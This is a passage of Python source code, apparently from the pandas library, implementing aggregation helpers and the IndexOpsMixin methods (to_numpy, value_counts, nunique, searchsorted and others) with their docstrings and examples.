\"'{arg}' is not a valid function for \"\n \"'{cls}' object\".format(arg=arg, cls=type(self).__name__)\n )\n\n def _aggregate(self, arg, *args, **kwargs):\n \"\"\"\n provide an implementation for the aggregators\n\n Parameters\n ----------\n arg : string, dict, function\n *args : args to pass on to the function\n **kwargs : kwargs to pass on to the function\n\n Returns\n -------\n tuple of result, how\n\n Notes\n -----\n how can be a string describe the required post-processing, or\n None if not required\n \"\"\"\n is_aggregator = lambda x: isinstance(x, (list, tuple, dict))\n is_nested_renamer = False\n\n _axis = kwargs.pop(\"_axis\", None)\n if _axis is None:\n _axis = getattr(self, \"axis\", 0)\n _level = kwargs.pop(\"_level\", None)\n\n if isinstance(arg, str):\n return self._try_aggregate_string_function(arg, *args, **kwargs), None\n\n if isinstance(arg, dict):\n\n # aggregate based on the passed dict\n if _axis != 0: # pragma: no cover\n raise ValueError(\"Can only pass dict with axis=0\")\n\n obj = self._selected_obj\n\n def nested_renaming_depr(level=4):\n # deprecation of nested renaming\n # GH 15931\n msg = textwrap.dedent(\n \"\"\"\\\n using a dict with renaming is deprecated and will be removed\n in a future version.\n\n For column-specific groupby renaming, use named aggregation\n\n >>> df.groupby(...).agg(name=('column', aggfunc))\n \"\"\"\n )\n warnings.warn(msg, FutureWarning, stacklevel=level)\n\n # if we have a dict of any non-scalars\n # eg. 
{'A' : ['mean']}, normalize all to\n # be list-likes\n if any(is_aggregator(x) for x in arg.values()):\n new_arg = OrderedDict()\n for k, v in arg.items():\n if not isinstance(v, (tuple, list, dict)):\n new_arg[k] = [v]\n else:\n new_arg[k] = v\n\n # the keys must be in the columns\n # for ndim=2, or renamers for ndim=1\n\n # ok for now, but deprecated\n # {'A': { 'ra': 'mean' }}\n # {'A': { 'ra': ['mean'] }}\n # {'ra': ['mean']}\n\n # not ok\n # {'ra' : { 'A' : 'mean' }}\n if isinstance(v, dict):\n is_nested_renamer = True\n\n if k not in obj.columns:\n msg = (\n \"cannot perform renaming for {key} with a \"\n \"nested dictionary\"\n ).format(key=k)\n raise SpecificationError(msg)\n nested_renaming_depr(4 + (_level or 0))\n\n elif isinstance(obj, ABCSeries):\n nested_renaming_depr()\n elif isinstance(obj, ABCDataFrame) and k not in obj.columns:\n raise KeyError(\"Column '{col}' does not exist!\".format(col=k))\n\n arg = new_arg\n\n else:\n # deprecation of renaming keys\n # GH 15931\n keys = list(arg.keys())\n if isinstance(obj, ABCDataFrame) and len(\n obj.columns.intersection(keys)\n ) != len(keys):\n nested_renaming_depr()\n\n from pandas.core.reshape.concat import concat\n\n def _agg_1dim(name, how, subset=None):\n \"\"\"\n aggregate a 1-dim with how\n \"\"\"\n colg = self._gotitem(name, ndim=1, subset=subset)\n if colg.ndim != 1:\n raise SpecificationError(\n \"nested dictionary is ambiguous in aggregation\"\n )\n return colg.aggregate(how, _level=(_level or 0) + 1)\n\n def _agg_2dim(name, how):\n \"\"\"\n aggregate a 2-dim with how\n \"\"\"\n colg = self._gotitem(self._selection, ndim=2, subset=obj)\n return colg.aggregate(how, _level=None)\n\n def _agg(arg, func):\n \"\"\"\n run the aggregations over the arg with func\n return an OrderedDict\n \"\"\"\n result = OrderedDict()\n for fname, agg_how in arg.items():\n result[fname] = func(fname, agg_how)\n return result\n\n # set the final keys\n keys = list(arg.keys())\n result = OrderedDict()\n\n # nested renamer\n if is_nested_renamer:\n result = list(_agg(arg, _agg_1dim).values())\n\n if all(isinstance(r, dict) for r in result):\n\n result, results = OrderedDict(), result\n for r in results:\n result.update(r)\n keys = list(result.keys())\n\n else:\n\n if self._selection is not None:\n keys = None\n\n # some selection on the object\n elif self._selection is not None:\n\n sl = set(self._selection_list)\n\n # we are a Series like object,\n # but may have multiple aggregations\n if len(sl) == 1:\n\n result = _agg(\n arg, lambda fname, agg_how: _agg_1dim(self._selection, agg_how)\n )\n\n # we are selecting the same set as we are aggregating\n elif not len(sl - set(keys)):\n\n result = _agg(arg, _agg_1dim)\n\n # we are a DataFrame, with possibly multiple aggregations\n else:\n\n result = _agg(arg, _agg_2dim)\n\n # no selection\n else:\n\n try:\n result = _agg(arg, _agg_1dim)\n except SpecificationError:\n\n # we are aggregating expecting all 1d-returns\n # but we have 2d\n result = _agg(arg, _agg_2dim)\n\n # combine results\n\n def is_any_series():\n # return a boolean if we have *any* nested series\n return any(isinstance(r, ABCSeries) for r in result.values())\n\n def is_any_frame():\n # return a boolean if we have *any* nested series\n return any(isinstance(r, ABCDataFrame) for r in result.values())\n\n if isinstance(result, list):\n return concat(result, keys=keys, axis=1, sort=True), True\n\n elif is_any_frame():\n # we have a dict of DataFrames\n # return a MI DataFrame\n\n return concat([result[k] for k in keys], keys=keys, 
axis=1), True\n\n elif isinstance(self, ABCSeries) and is_any_series():\n\n # we have a dict of Series\n # return a MI Series\n try:\n result = concat(result)\n except TypeError:\n # we want to give a nice error here if\n # we have non-same sized objects, so\n # we don't automatically broadcast\n\n raise ValueError(\n \"cannot perform both aggregation \"\n \"and transformation operations \"\n \"simultaneously\"\n )\n\n return result, True\n\n # fall thru\n from pandas import DataFrame, Series\n\n try:\n result = DataFrame(result)\n except ValueError:\n\n # we have a dict of scalars\n result = Series(result, name=getattr(self, \"name\", None))\n\n return result, True\n elif is_list_like(arg):\n # we require a list, but not an 'str'\n return self._aggregate_multiple_funcs(arg, _level=_level, _axis=_axis), None\n else:\n result = None\n\n f = self._get_cython_func(arg)\n if f and not args and not kwargs:\n return getattr(self, f)(), None\n\n # caller can react\n return result, True\n\n def _aggregate_multiple_funcs(self, arg, _level, _axis):\n from pandas.core.reshape.concat import concat\n\n if _axis != 0:\n raise NotImplementedError(\"axis other than 0 is not supported\")\n\n if self._selected_obj.ndim == 1:\n obj = self._selected_obj\n else:\n obj = self._obj_with_exclusions\n\n results = []\n keys = []\n\n # degenerate case\n if obj.ndim == 1:\n for a in arg:\n colg = self._gotitem(obj.name, ndim=1, subset=obj)\n try:\n new_res = colg.aggregate(a)\n\n except (TypeError, DataError):\n pass\n else:\n results.append(new_res)\n\n # make sure we find a good name\n name = com.get_callable_name(a) or a\n keys.append(name)\n\n # multiples\n else:\n for index, col in enumerate(obj):\n colg = self._gotitem(col, ndim=1, subset=obj.iloc[:, index])\n try:\n new_res = colg.aggregate(arg)\n except (TypeError, DataError):\n pass\n except ValueError as err:\n # cannot aggregate\n if \"Must produce aggregated value\" in str(err):\n # raised directly in _aggregate_named\n pass\n elif \"no results\" in str(err):\n # raised direcly in _aggregate_multiple_funcs\n pass\n else:\n raise\n else:\n results.append(new_res)\n keys.append(col)\n\n # if we are empty\n if not len(results):\n raise ValueError(\"no results\")\n\n try:\n return concat(results, keys=keys, axis=1, sort=False)\n except TypeError:\n\n # we are concatting non-NDFrame objects,\n # e.g. 
a list of scalars\n\n from pandas import Series\n\n result = Series(results, index=keys, name=self.name)\n if is_nested_object(result):\n raise ValueError(\"cannot combine transform and aggregation operations\")\n return result\n\n def _shallow_copy(self, obj=None, obj_type=None, **kwargs):\n \"\"\"\n return a new object with the replacement attributes\n \"\"\"\n if obj is None:\n obj = self._selected_obj.copy()\n if obj_type is None:\n obj_type = self._constructor\n if isinstance(obj, obj_type):\n obj = obj.obj\n for attr in self._attributes:\n if attr not in kwargs:\n kwargs[attr] = getattr(self, attr)\n return obj_type(obj, **kwargs)\n\n def _get_cython_func(self, arg: str) -> Optional[str]:\n \"\"\"\n if we define an internal function for this argument, return it\n \"\"\"\n return self._cython_table.get(arg)\n\n def _is_builtin_func(self, arg):\n \"\"\"\n if we define an builtin function for this argument, return it,\n otherwise return the arg\n \"\"\"\n return self._builtin_table.get(arg, arg)\n\n\nclass IndexOpsMixin:\n \"\"\"\n Common ops mixin to support a unified interface / docs for Series / Index\n \"\"\"\n\n # ndarray compatibility\n __array_priority__ = 1000\n _deprecations = frozenset(\n [\n \"tolist\", # tolist is not deprecated, just suppressed in the __dir__\n \"base\",\n \"data\",\n \"item\",\n \"itemsize\",\n \"flags\",\n \"strides\",\n ]\n ) # type: FrozenSet[str]\n\n def transpose(self, *args, **kwargs):\n \"\"\"\n Return the transpose, which is by definition self.\n\n Returns\n -------\n %(klass)s\n \"\"\"\n nv.validate_transpose(args, kwargs)\n return self\n\n T = property(\n transpose,\n doc=\"\"\"\n Return the transpose, which is by definition self.\n \"\"\",\n )\n\n @property\n def _is_homogeneous_type(self):\n \"\"\"\n Whether the object has a single dtype.\n\n By definition, Series and Index are always considered homogeneous.\n A MultiIndex may or may not be homogeneous, depending on the\n dtypes of the levels.\n\n See Also\n --------\n DataFrame._is_homogeneous_type : Whether all the columns in a\n DataFrame have the same dtype.\n MultiIndex._is_homogeneous_type : Whether all the levels of a\n MultiIndex have the same dtype.\n \"\"\"\n return True\n\n @property\n def shape(self):\n \"\"\"\n Return a tuple of the shape of the underlying data.\n \"\"\"\n return self._values.shape\n\n @property\n def ndim(self):\n \"\"\"\n Number of dimensions of the underlying data, by definition 1.\n \"\"\"\n return 1\n\n def item(self):\n \"\"\"\n Return the first element of the underlying data as a python scalar.\n\n .. deprecated:: 0.25.0\n\n Returns\n -------\n scalar\n The first element of %(klass)s.\n \"\"\"\n warnings.warn(\n \"`item` has been deprecated and will be removed in a future version\",\n FutureWarning,\n stacklevel=2,\n )\n return self.values.item()\n\n @property\n def data(self):\n \"\"\"\n Return the data pointer of the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.data is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self.values.data\n\n @property\n def itemsize(self):\n \"\"\"\n Return the size of the dtype of the item of the underlying data.\n\n .. 
deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.itemsize is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self._ndarray_values.itemsize\n\n @property\n def nbytes(self):\n \"\"\"\n Return the number of bytes in the underlying data.\n \"\"\"\n return self._values.nbytes\n\n @property\n def strides(self):\n \"\"\"\n Return the strides of the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.strides is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self._ndarray_values.strides\n\n @property\n def size(self):\n \"\"\"\n Return the number of elements in the underlying data.\n \"\"\"\n return len(self._values)\n\n @property\n def flags(self):\n \"\"\"\n Return the ndarray.flags for the underlying data.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.flags is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self.values.flags\n\n @property\n def base(self):\n \"\"\"\n Return the base object if the memory of the underlying data is shared.\n\n .. deprecated:: 0.23.0\n \"\"\"\n warnings.warn(\n \"{obj}.base is deprecated and will be removed \"\n \"in a future version\".format(obj=type(self).__name__),\n FutureWarning,\n stacklevel=2,\n )\n return self.values.base\n\n @property\n def array(self) -> ExtensionArray:\n \"\"\"\n The ExtensionArray of the data backing this Series or Index.\n\n .. versionadded:: 0.24.0\n\n Returns\n -------\n ExtensionArray\n An ExtensionArray of the values stored within. For extension\n types, this is the actual array. For NumPy native types, this\n is a thin (no copy) wrapper around :class:`numpy.ndarray`.\n\n ``.array`` differs ``.values`` which may require converting the\n data to a different form.\n\n See Also\n --------\n Index.to_numpy : Similar method that always returns a NumPy array.\n Series.to_numpy : Similar method that always returns a NumPy array.\n\n Notes\n -----\n This table lays out the different array types for each extension\n dtype within pandas.\n\n ================== =============================\n dtype array type\n ================== =============================\n category Categorical\n period PeriodArray\n interval IntervalArray\n IntegerNA IntegerArray\n datetime64[ns, tz] DatetimeArray\n ================== =============================\n\n For any 3rd-party extension types, the array type will be an\n ExtensionArray.\n\n For all remaining dtypes ``.array`` will be a\n :class:`arrays.NumpyExtensionArray` wrapping the actual ndarray\n stored within. 
If you absolutely need a NumPy array (possibly with\n copying / coercing data), then use :meth:`Series.to_numpy` instead.\n\n Examples\n --------\n\n For regular NumPy types like int, and float, a PandasArray\n is returned.\n\n >>> pd.Series([1, 2, 3]).array\n \n [1, 2, 3]\n Length: 3, dtype: int64\n\n For extension types, like Categorical, the actual ExtensionArray\n is returned\n\n >>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))\n >>> ser.array\n [a, b, a]\n Categories (2, object): [a, b]\n \"\"\"\n # As a mixin, we depend on the mixing class having _values.\n # Special mixin syntax may be developed in the future:\n # https://github.com/python/typing/issues/246\n result = self._values # type: ignore\n\n if is_datetime64_ns_dtype(result.dtype):\n from pandas.arrays import DatetimeArray\n\n result = DatetimeArray(result)\n elif is_timedelta64_ns_dtype(result.dtype):\n from pandas.arrays import TimedeltaArray\n\n result = TimedeltaArray(result)\n\n elif not is_extension_array_dtype(result.dtype):\n from pandas.core.arrays.numpy_ import PandasArray\n\n result = PandasArray(result)\n\n return result\n\n def to_numpy(self, dtype=None, copy=False):\n \"\"\"\n A NumPy ndarray representing the values in this Series or Index.\n\n .. versionadded:: 0.24.0\n\n Parameters\n ----------\n dtype : str or numpy.dtype, optional\n The dtype to pass to :meth:`numpy.asarray`.\n copy : bool, default False\n Whether to ensure that the returned value is a not a view on\n another array. Note that ``copy=False`` does not *ensure* that\n ``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that\n a copy is made, even if not strictly necessary.\n\n Returns\n -------\n numpy.ndarray\n\n See Also\n --------\n Series.array : Get the actual data stored within.\n Index.array : Get the actual data stored within.\n DataFrame.to_numpy : Similar method for DataFrame.\n\n Notes\n -----\n The returned array will be the same up to equality (values equal\n in `self` will be equal in the returned array; likewise for values\n that are not equal). When `self` contains an ExtensionArray, the\n dtype may be different. For example, for a category-dtype Series,\n ``to_numpy()`` will return a NumPy array and the categorical dtype\n will be lost.\n\n For NumPy dtypes, this will be a reference to the actual data stored\n in this Series or Index (assuming ``copy=False``). Modifying the result\n in place will modify the data stored in the Series or Index (not that\n we recommend doing that).\n\n For extension types, ``to_numpy()`` *may* require copying data and\n coercing the result to a NumPy type (possibly object), which may be\n expensive. 
When you need a no-copy reference to the underlying data,\n :attr:`Series.array` should be used instead.\n\n This table lays out the different dtypes and default return types of\n ``to_numpy()`` for various dtypes within pandas.\n\n ================== ================================\n dtype array type\n ================== ================================\n category[T] ndarray[T] (same dtype as input)\n period ndarray[object] (Periods)\n interval ndarray[object] (Intervals)\n IntegerNA ndarray[object]\n datetime64[ns] datetime64[ns]\n datetime64[ns, tz] ndarray[object] (Timestamps)\n ================== ================================\n\n Examples\n --------\n >>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))\n >>> ser.to_numpy()\n array(['a', 'b', 'a'], dtype=object)\n\n Specify the `dtype` to control how datetime-aware data is represented.\n Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`\n objects, each with the correct ``tz``.\n\n >>> ser = pd.Series(pd.date_range('2000', periods=2, tz=\"CET\"))\n >>> ser.to_numpy(dtype=object)\n array([Timestamp('2000-01-01 00:00:00+0100', tz='CET', freq='D'),\n Timestamp('2000-01-02 00:00:00+0100', tz='CET', freq='D')],\n dtype=object)\n\n Or ``dtype='datetime64[ns]'`` to return an ndarray of native\n datetime64 values. The values are converted to UTC and the timezone\n info is dropped.\n\n >>> ser.to_numpy(dtype=\"datetime64[ns]\")\n ... # doctest: +ELLIPSIS\n array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],\n dtype='datetime64[ns]')\n \"\"\"\n if is_datetime64tz_dtype(self.dtype) and dtype is None:\n # note: this is going to change very soon.\n # I have a WIP PR making this unnecessary, but it's\n # a bit out of scope for the DatetimeArray PR.\n dtype = \"object\"\n\n result = np.asarray(self._values, dtype=dtype)\n # TODO(GH-24345): Avoid potential double copy\n if copy:\n result = result.copy()\n return result\n\n @property\n def _ndarray_values(self) -> np.ndarray:\n \"\"\"\n The data as an ndarray, possibly losing information.\n\n The expectation is that this is cheap to compute, and is primarily\n used for interacting with our indexers.\n\n - categorical -> codes\n \"\"\"\n if is_extension_array_dtype(self):\n return self.array._ndarray_values\n # As a mixin, we depend on the mixing class having values.\n # Special mixin syntax may be developed in the future:\n # https://github.com/python/typing/issues/246\n return self.values # type: ignore\n\n @property\n def empty(self):\n return not self.size\n\n def max(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return the maximum value of the Index.\n\n Parameters\n ----------\n axis : int, optional\n For compatibility with NumPy. 
Only 0 or None are allowed.\n skipna : bool, default True\n\n Returns\n -------\n scalar\n Maximum value.\n\n See Also\n --------\n Index.min : Return the minimum value in an Index.\n Series.max : Return the maximum value in a Series.\n DataFrame.max : Return the maximum values in a DataFrame.\n\n Examples\n --------\n >>> idx = pd.Index([3, 2, 1])\n >>> idx.max()\n 3\n\n >>> idx = pd.Index(['c', 'b', 'a'])\n >>> idx.max()\n 'c'\n\n For a MultiIndex, the maximum is determined lexicographically.\n\n >>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])\n >>> idx.max()\n ('b', 2)\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_max(args, kwargs)\n return nanops.nanmax(self._values, skipna=skipna)\n\n def argmax(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return an ndarray of the maximum argument indexer.\n\n Parameters\n ----------\n axis : {None}\n Dummy argument for consistency with Series.\n skipna : bool, default True\n\n Returns\n -------\n numpy.ndarray\n Indices of the maximum values.\n\n See Also\n --------\n numpy.ndarray.argmax\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_argmax_with_skipna(skipna, args, kwargs)\n return nanops.nanargmax(self._values, skipna=skipna)\n\n def min(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return the minimum value of the Index.\n\n Parameters\n ----------\n axis : {None}\n Dummy argument for consistency with Series.\n skipna : bool, default True\n\n Returns\n -------\n scalar\n Minimum value.\n\n See Also\n --------\n Index.max : Return the maximum value of the object.\n Series.min : Return the minimum value in a Series.\n DataFrame.min : Return the minimum values in a DataFrame.\n\n Examples\n --------\n >>> idx = pd.Index([3, 2, 1])\n >>> idx.min()\n 1\n\n >>> idx = pd.Index(['c', 'b', 'a'])\n >>> idx.min()\n 'a'\n\n For a MultiIndex, the minimum is determined lexicographically.\n\n >>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])\n >>> idx.min()\n ('a', 1)\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_min(args, kwargs)\n return nanops.nanmin(self._values, skipna=skipna)\n\n def argmin(self, axis=None, skipna=True, *args, **kwargs):\n \"\"\"\n Return a ndarray of the minimum argument indexer.\n\n Parameters\n ----------\n axis : {None}\n Dummy argument for consistency with Series.\n skipna : bool, default True\n\n Returns\n -------\n numpy.ndarray\n\n See Also\n --------\n numpy.ndarray.argmin\n \"\"\"\n nv.validate_minmax_axis(axis)\n nv.validate_argmax_with_skipna(skipna, args, kwargs)\n return nanops.nanargmin(self._values, skipna=skipna)\n\n def tolist(self):\n \"\"\"\n Return a list of the values.\n\n These are each a scalar type, which is a Python scalar\n (for str, int, float) or a pandas scalar\n (for Timestamp/Timedelta/Interval/Period)\n\n Returns\n -------\n list\n\n See Also\n --------\n numpy.ndarray.tolist\n \"\"\"\n if is_datetimelike(self._values):\n return [com.maybe_box_datetimelike(x) for x in self._values]\n elif is_extension_array_dtype(self._values):\n return list(self._values)\n else:\n return self._values.tolist()\n\n to_list = tolist\n\n def __iter__(self):\n \"\"\"\n Return an iterator of the values.\n\n These are each a scalar type, which is a Python scalar\n (for str, int, float) or a pandas scalar\n (for Timestamp/Timedelta/Interval/Period)\n\n Returns\n -------\n iterator\n \"\"\"\n # We are explicitly making element iterators.\n if is_datetimelike(self._values):\n return map(com.maybe_box_datetimelike, self._values)\n elif 
is_extension_array_dtype(self._values):\n return iter(self._values)\n else:\n return map(self._values.item, range(self._values.size))\n\n @cache_readonly\n def hasnans(self):\n \"\"\"\n Return if I have any nans; enables various perf speedups.\n \"\"\"\n return bool(isna(self).any())\n\n def _reduce(\n self, op, name, axis=0, skipna=True, numeric_only=None, filter_type=None, **kwds\n ):\n \"\"\" perform the reduction type operation if we can \"\"\"\n func = getattr(self, name, None)\n if func is None:\n raise TypeError(\n \"{klass} cannot perform the operation {op}\".format(\n klass=self.__class__.__name__, op=name\n )\n )\n return func(skipna=skipna, **kwds)\n\n def _map_values(self, mapper, na_action=None):\n \"\"\"\n An internal function that maps values using the input\n correspondence (which can be a dict, Series, or function).\n\n Parameters\n ----------\n mapper : function, dict, or Series\n The input correspondence object\n na_action : {None, 'ignore'}\n If 'ignore', propagate NA values, without passing them to the\n mapping function\n\n Returns\n -------\n Union[Index, MultiIndex], inferred\n The output of the mapping function applied to the index.\n If the function returns a tuple with more than one element\n a MultiIndex will be returned.\n\n \"\"\"\n\n # we can fastpath dict/Series to an efficient map\n # as we know that we are not going to have to yield\n # python types\n if isinstance(mapper, dict):\n if hasattr(mapper, \"__missing__\"):\n # If a dictionary subclass defines a default value method,\n # convert mapper to a lookup function (GH #15999).\n dict_with_default = mapper\n mapper = lambda x: dict_with_default[x]\n else:\n # Dictionary does not have a default. Thus it's safe to\n # convert to an Series for efficiency.\n # we specify the keys here to handle the\n # possibility that they are tuples\n from pandas import Series\n\n mapper = Series(mapper)\n\n if isinstance(mapper, ABCSeries):\n # Since values were input this means we came from either\n # a dict or a series and mapper should be an index\n if is_categorical_dtype(self._values):\n # use the built in categorical series mapper which saves\n # time by mapping the categories instead of all values\n return self._values.map(mapper)\n if is_extension_type(self.dtype):\n values = self._values\n else:\n values = self.values\n\n indexer = mapper.index.get_indexer(values)\n new_values = algorithms.take_1d(mapper._values, indexer)\n\n return new_values\n\n # we must convert to python types\n if is_extension_type(self.dtype):\n values = self._values\n if na_action is not None:\n raise NotImplementedError\n map_f = lambda values, f: values.map(f)\n else:\n values = self.astype(object)\n values = getattr(values, \"values\", values)\n if na_action == \"ignore\":\n\n def map_f(values, f):\n return lib.map_infer_mask(values, f, isna(values).view(np.uint8))\n\n else:\n map_f = lib.map_infer\n\n # mapper is a function\n new_values = map_f(values, mapper)\n\n return new_values\n\n def value_counts(\n self, normalize=False, sort=True, ascending=False, bins=None, dropna=True\n ):\n \"\"\"\n Return a Series containing counts of unique values.\n\n The resulting object will be in descending order so that the\n first element is the most frequently-occurring element.\n Excludes NA values by default.\n\n Parameters\n ----------\n normalize : bool, default False\n If True then the object returned will contain the relative\n frequencies of the unique values.\n sort : bool, default True\n Sort by frequencies.\n ascending : bool, default 
False\n Sort in ascending order.\n bins : int, optional\n Rather than count values, group them into half-open bins,\n a convenience for ``pd.cut``, only works with numeric data.\n dropna : bool, default True\n Don't include counts of NaN.\n\n Returns\n -------\n Series\n\n See Also\n --------\n Series.count: Number of non-NA elements in a Series.\n DataFrame.count: Number of non-NA elements in a DataFrame.\n\n Examples\n --------\n >>> index = pd.Index([3, 1, 2, 3, 4, np.nan])\n >>> index.value_counts()\n 3.0 2\n 4.0 1\n 2.0 1\n 1.0 1\n dtype: int64\n\n With `normalize` set to `True`, returns the relative frequency by\n dividing all values by the sum of values.\n\n >>> s = pd.Series([3, 1, 2, 3, 4, np.nan])\n >>> s.value_counts(normalize=True)\n 3.0 0.4\n 4.0 0.2\n 2.0 0.2\n 1.0 0.2\n dtype: float64\n\n **bins**\n\n Bins can be useful for going from a continuous variable to a\n categorical variable; instead of counting unique\n apparitions of values, divide the index in the specified\n number of half-open bins.\n\n >>> s.value_counts(bins=3)\n (2.0, 3.0] 2\n (0.996, 2.0] 2\n (3.0, 4.0] 1\n dtype: int64\n\n **dropna**\n\n With `dropna` set to `False` we can also see NaN index values.\n\n >>> s.value_counts(dropna=False)\n 3.0 2\n NaN 1\n 4.0 1\n 2.0 1\n 1.0 1\n dtype: int64\n \"\"\"\n result = value_counts(\n self,\n sort=sort,\n ascending=ascending,\n normalize=normalize,\n bins=bins,\n dropna=dropna,\n )\n return result\n\n def unique(self):\n values = self._values\n\n if hasattr(values, \"unique\"):\n\n result = values.unique()\n else:\n result = unique1d(values)\n\n return result\n\n def nunique(self, dropna=True):\n \"\"\"\n Return number of unique elements in the object.\n\n Excludes NA values by default.\n\n Parameters\n ----------\n dropna : bool, default True\n Don't include NaN in the count.\n\n Returns\n -------\n int\n\n See Also\n --------\n DataFrame.nunique: Method nunique for DataFrame.\n Series.count: Count non-NA/null observations in the Series.\n\n Examples\n --------\n >>> s = pd.Series([1, 3, 5, 7, 7])\n >>> s\n 0 1\n 1 3\n 2 5\n 3 7\n 4 7\n dtype: int64\n\n >>> s.nunique()\n 4\n \"\"\"\n uniqs = self.unique()\n n = len(uniqs)\n if dropna and isna(uniqs).any():\n n -= 1\n return n\n\n @property\n def is_unique(self):\n \"\"\"\n Return boolean if values in the object are unique.\n\n Returns\n -------\n bool\n \"\"\"\n return self.nunique(dropna=False) == len(self)\n\n @property\n def is_monotonic(self):\n \"\"\"\n Return boolean if values in the object are\n monotonic_increasing.\n\n Returns\n -------\n bool\n \"\"\"\n from pandas import Index\n\n return Index(self).is_monotonic\n\n is_monotonic_increasing = is_monotonic\n\n @property\n def is_monotonic_decreasing(self):\n \"\"\"\n Return boolean if values in the object are\n monotonic_decreasing.\n\n Returns\n -------\n bool\n \"\"\"\n from pandas import Index\n\n return Index(self).is_monotonic_decreasing\n\n def memory_usage(self, deep=False):\n \"\"\"\n Memory usage of the values.\n\n Parameters\n ----------\n deep : bool\n Introspect the data deeply, interrogate\n `object` dtypes for system-level memory consumption.\n\n Returns\n -------\n bytes used\n\n See Also\n --------\n numpy.ndarray.nbytes\n\n Notes\n -----\n Memory usage does not include memory consumed by elements that\n are not components of the array if deep=False or if used on PyPy\n \"\"\"\n if hasattr(self.array, \"memory_usage\"):\n return self.array.memory_usage(deep=deep)\n\n v = self.array.nbytes\n if deep and is_object_dtype(self) and not PYPY:\n 
v += lib.memory_usage_of_objects(self.array)\n return v\n\n @Substitution(\n values=\"\",\n order=\"\",\n size_hint=\"\",\n sort=textwrap.dedent(\n \"\"\"\\\n sort : bool, default False\n Sort `uniques` and shuffle `labels` to maintain the\n relationship.\n \"\"\"\n ),\n )\n @Appender(algorithms._shared_docs[\"factorize\"])\n def factorize(self, sort=False, na_sentinel=-1):\n return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)\n\n _shared_docs[\n \"searchsorted\"\n ] = \"\"\"\n Find indices where elements should be inserted to maintain order.\n\n Find the indices into a sorted %(klass)s `self` such that, if the\n corresponding elements in `value` were inserted before the indices,\n the order of `self` would be preserved.\n\n .. note::\n\n The %(klass)s *must* be monotonically sorted, otherwise\n wrong locations will likely be returned. Pandas does *not*\n check this for you.\n\n Parameters\n ----------\n value : array_like\n Values to insert into `self`.\n side : {'left', 'right'}, optional\n If 'left', the index of the first suitable location found is given.\n If 'right', return the last such index. If there is no suitable\n index, return either 0 or N (where N is the length of `self`).\n sorter : 1-D array_like, optional\n Optional array of integer indices that sort `self` into ascending\n order. They are typically the result of ``np.argsort``.\n\n Returns\n -------\n int or array of int\n A scalar or array of insertion points with the\n same shape as `value`.\n\n .. versionchanged:: 0.24.0\n If `value` is a scalar, an int is now always returned.\n Previously, scalar inputs returned an 1-item array for\n :class:`Series` and :class:`Categorical`.\n\n See Also\n --------\n sort_values\n numpy.searchsorted\n\n Notes\n -----\n Binary search is used to find the required insertion points.\n\n Examples\n --------\n\n >>> x = pd.Series([1, 2, 3])\n >>> x\n 0 1\n 1 2\n 2 3\n dtype: int64\n\n >>> x.searchsorted(4)\n 3\n\n >>> x.searchsorted([0, 4])\n array([0, 3])\n\n >>> x.searchsorted([1, 3], side='left')\n array([0, 2])\n\n >>> x.searchsorted([1, 3], side='right')\n array([1, 3])\n\n >>> x = pd.Categorical(['apple', 'bread', 'bread',\n 'cheese', 'milk'], ordered=True)\n [apple, bread, bread, cheese, milk]\n Categories (4, object): [apple < bread < cheese < milk]\n\n >>> x.searchsorted('bread')\n 1\n\n >>> x.searchsorted(['bread'], side='right')\n array([3])\n\n If the values are not monotonically sorted, wrong locations\n may be returned:\n\n >>> x = pd.Series([2, 1, 3])\n >>> x.searchsorted(1)\n 0 # wrong result, correct would be 1\n \"\"\"\n\n @Substitution(klass=\"Index\")\n @Appender(_shared_docs[\"searchsorted\"])\n def searchsorted(self, value, side=\"left\", sorter=None):\n return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)\n\n def drop_duplicates(self, keep=\"first\", inplace=False):\n inplace = validate_bool_kwarg(inplace, \"inplace\")\n if isinstance(self, ABCIndexClass):\n if self.is_unique:\n return self._shallow_copy()\n\n duplicated = self.duplicated(keep=keep)\n result = self[np.logical_not(duplicated)]\n if inplace:\n return self._update_inplace(result)\n else:\n return result\n\n def duplicated(self, keep=\"first\"):\n if isinstance(self, ABCIndexClass):\n if self.is_unique:\n return np.zeros(len(self), dtype=np.bool)\n return duplicated(self, keep=keep)\n else:\n return self._constructor(\n duplicated(self, keep=keep), index=self.index\n ).__finalize__(self)\n\n # 
